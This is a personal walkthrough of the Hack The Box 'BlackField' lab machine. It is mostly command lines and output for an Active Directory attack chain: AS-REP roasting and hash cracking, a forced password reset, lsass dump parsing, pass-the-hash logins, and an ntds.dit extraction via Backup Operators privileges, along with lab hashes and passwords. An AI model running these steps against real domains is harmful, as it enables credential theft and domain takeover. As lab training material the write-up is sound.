HTB - BlackField

Machine Info

Backfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. Once user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.

Enumeration

Scope

IP Address: 10. 10.10.192

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE        REASON
53/tcp   open  domain         syn-ack
88/tcp   open  kerberos-sec   syn-ack
135/tcp  open  msrpc          syn-ack
389/tcp  open  ldap           syn-ack
445/tcp  open  microsoft-ds   syn-ack
593/tcp  open  http-rpc-epmap syn-ack
3268/tcp open  globalcatLDAP  syn-ack
5985/tcp open  wsman          syn-ack


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,135,389,445,593,3268,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-12 23:31:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m02s
| smb2-time: 
|   date: 2024-07-12T23:31:51
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

* Open ports: 53,88,135,389,445,593,3268,5985
* Services: DNS - KERBEROS - RPC - SMB - winRM
* Important Notes: Domain: BLACKFIELD.local

RPC Enumeration

SMB Enumeration

When I connected to smb server with anonymous login, it failed

However, when I attempted to authenticate with guest account, I got a hit

smbclient shows the same results, too

I mounted the share to my kali machine to explore it easily

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\profiles$" ./mount
Password for root@\\10.10.10.192\profiles$:

The folders have names of humans which can be users' home directories, So I will append these names to a list and attempt it against Kerberos to find valid usernames

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount | tee -a users.lst

<snip>

Kerberos Enumeration

I found three valid users with kerbrute

When I attempted ASREP-Roasting attack against these users, I got a hash of user support

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275cevioeb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9:#00^BlackKnight

Session..........: hashcat
Status...........: Cracked

Initial Access

Confirm the credentials we got

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight'

SMB     10.10.10.192    445    DC01    [+] BLACKFIELD.local\support:#00^BlackKnight

List shares that support has access to

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight' --shares                                                                   
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight                                    
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark                                          
SMB         10.10.10.192    445    DC01             -----           -----------     ------                                          
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin                                    
SMB         10.10.10.192    445    DC01             C$                              Default share                                   
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.                         
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC                                      
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share                              
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 

• I couldn't find any interesting files even I had valid credentials, So I will continue enumeration with bloodhound.py

Enumerate the domain with bloodhound.py and feed the zip file to bloodhound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d blackfield.local -c all

Looking at bloodhound, I found that suppport can Chane password of audit2020

I provide a custom query to bloodhound to see what user can PSRemote to the machine

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

I searched for a way to change user's password from without access to the machine and I found this command from this post: https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ rpcclient -U "support%#00^BlackKnight" $ip

rpcclient $> setuserinfo
Usage: setuserinfo username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo audit2020 23 P@ssword123!

I managed to change the user password but still not have access to the machine, So I will try to enumerate the share again with the user audit2020

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!'                              
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:P@ssword123! 

I got a read access on share forensic with the user audit2020

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!' --shares

SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:P@ssword123! 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 

I will mount the share to my kali machine and start navigate it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\forensic" ./mount -o "username=audit2020,password=P@ssword123\!" 
[sudo] password for kali: 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount         
commands_output  memory_analysis  tools

These two directories look interesting and lsass.zip file is the most important file here

zip file content

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip -l lsass.zip                               
Archive:  lsass.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
143044222  2020-02-23 11:02   lsass.DMP
---------                     -------
143044222                     1 file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip lsass.zip   
Archive:  lsass.zip
  inflating: lsass.DMP

I will extract secrets from this memory dump with pypykatz, It's like mimikatz but for Linux

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ pypykatz lsa minidump ./lsass.DMP

FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621

<snip>

== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a8955

<snip>

I tried to authenticate with NT hash for svc_backup and administrator. I got a hit with svc_backup but didn't with admin

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d     

SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

SMB         10.10.10.192    445    DC01             [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE 

we know from bloodhound that we can PSRemote to the machine with svc_backup account, So I will start evil-winrm

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
3920bb317a0bef51xxxxxxxxxxxxxxxx

User Flag: 3920bb317a0bef51xxxxxxxxxxxxxxxx

Privilege Escalation

svc_backup is a member of privileged group Backup operators which can be abused to get Domain admin privileges.

I will create a backup of ntds.dit as shadow copy with diskshadow.exe. create this file that contains commands for diskshadow utility

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit

I run an issue when running diskshadow, So I asked the community, and the solution was in endiness of the file and can be solved by this command

unix2dos vss.dsh

Create a shadow copy

*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s .\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  7/12/2024 7:46:57 PM

-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create

The shadow copy was successfully exposed as E:\.
-> end backup
-> exit

Copy the database file to current directory

*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.dit

get the system hive which we need to decrypt the database

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSETM SYSTEM.SAV

Dump the secrets from the database

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV  LOCAL                                                                                                                                                                           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480bxxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:a6504030ea199802f249588cdcabfab1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u administrator -H 184fb5e5178480bexxxxxxxxxxxx         

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4375a629c7c67c8e29dxxxxxxxxxxxx

Root Flag: 4375a629c7c67c8exxxxxxxxxxxx